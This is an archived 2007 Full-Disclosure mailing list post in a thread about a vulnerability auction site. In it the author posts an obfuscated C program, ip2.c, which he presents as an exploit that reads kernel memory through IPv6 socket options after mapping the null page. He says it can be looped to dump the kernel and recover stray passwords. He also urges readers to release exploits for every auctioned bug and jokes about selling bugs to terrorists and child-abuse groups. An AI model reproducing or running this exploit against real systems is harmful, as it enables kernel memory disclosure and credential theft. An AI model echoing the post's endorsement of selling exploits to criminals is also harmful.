lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 09 Jul 2007 13:44:14 -0400
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc: 
Subject:  An Auction Site for Vulnerabilities

Yes, Fakhar has put it best in English so far. 

As a sidenote, WabiSabi seems to have removed my account from their 
system already for unknown reasons. However, included inline is a 
simple exploit for one of the few bugs they are making available 
for currency exchange. I think you will find it trivial to find and 
exploit most (all?) of their other bugs, even those that aren't 
publicly documented ;)

Linux Torvalds documented this particular bug here:

http://bugzilla.kernel.org/show_bug.cgi?id=8134

I don't understand why it is for sale.

The following program can be used to hack 4 bytes out of kernel 
memory. Put it in a loop to dump all of the kernel. If you use an 
insecure program that hasn't been reviewed by the OpenBsD Secure 
Shell team, you might find unscrubbed passwords in there.

I encourage everyone to research and release exploits for every bug 
on the auction block. Remember: it is only consistent with REAL 
hacker ethics to sell bugs to terrorists, NAMBLA, and similar 
organizations such as GOBBLES/n3td3v.

J

__ ip2.c __
// advanced exploit code for catastrophic kernel bug by Joey 
Mengele, professional hacker
// user, to dump 0xaddress from kernel memory: ./ip2 0xaddress
#include <sys/signal.h>
typedef int fg8;
#include <sys/mman.h>
typedef long _l36;
#include <string.h>
typedef long * jayn9124;
#include <stdio.h>
typedef char * anal;
#include <netinet/in.h>
#define __exit main
#define __main exit
typedef void pleb;
#include <stdlib.h>
fg8 ___hh(fg8,_l36,jayn9124);
#include <unistd.h>
pleb _zzy();
#       define __f4 setsockopt
#       define __f5 getsockopt
fg8 __exit(fg8 argc, anal *argv[]) {
_l36 tmp;
fg8 s;
_l36 hud;
if (argc!=2) __main(-1);
if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1);
signal(SIGSEGV,&exit);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
_zzy();
__f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
___hh(s,hud,&tmp);
printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp);
return 0;
}
int ___hh(int bf,_l36 _rtg,jayn9124 rape)
{
fg8 ot=4;
*(jayn9124)(0x8) = _rtg;
return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot);
}
void _zzy()
{
_l36 *gol = NULL;
if( (gol = mmap( (void *)NULL, 4096,
PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 
)) == (void *) -1 )
{perror( "mmap" );exit(412);}
}
__ ip2.c EOF __

On Mon, 09 Jul 2007 02:41:57 -0400 Fakhar Imran 
<fakharmtc@...oo.com> wrote:
>Well... I believe that ppl do know vulns, that are not 
>discussed/discovered by 
>tech companies or open forums, and they use it for their personal 
>gains.  
>Its just a matter of single transaction that needs to be happen 
>and it'll spread 
>like a wild fire.
>
>cheers
>
>
>----- Original Message ----
>From: evilrabbi <evilrabbi@...il.com>
>To: Fakhar Imran <fakharmtc@...oo.com>
>Cc: Untitled <full-disclosure@...ts.grok.org.uk>
>Sent: Friday, July 6, 2007 7:29:02 PM
>Subject: Re: [Full-disclosure] An Auction Site for Vulnerabilities
>
>I wonder how long it's going to be untill someone finds a vuln in 
>that site then tries to auction it off.
>
>
>On 7/6/07, Fakhar Imran <fakharmtc@...oo.com> wrote: 
>Thanks for the information
>
>----- Original Message ----
>From: Ivan . < ivanhec@...il.com>
>To: Untitled <full-disclosure@...ts.grok.org.uk>
>Sent: Friday, July 6, 2007 11:38:17 AM
>Subject: [Full-disclosure] An Auction Site for Vulnerabilities 
>
>
>http://www.darkreading.com/document.asp?doc_id=128411&WT.svl=news1_
>1
>
>_______________________________________________ 
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>___________________________________________________________________
>_________________
>Pinpoint customers who are looking for what you sell.
>http://searchmarketing.yahoo.com/
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html 
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>-- 
>-- h0 h0 h0 --
>www.nopsled.net
>
>
> 
>___________________________________________________________________
>_________________
>Bored stiff? Loosen up... 
>Download and play hundreds of games for free on Yahoo! Games.
>http://games.yahoo.com/games/front

--
Click for special offer on replacement windows - energy efficient
http://tagline.hushmail.com/fc/Ioyw6h4eNoTcOxzEIQa8ZCqjSiLl3KdHV7Zyg0oKADI3bmKeS2TEXu/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ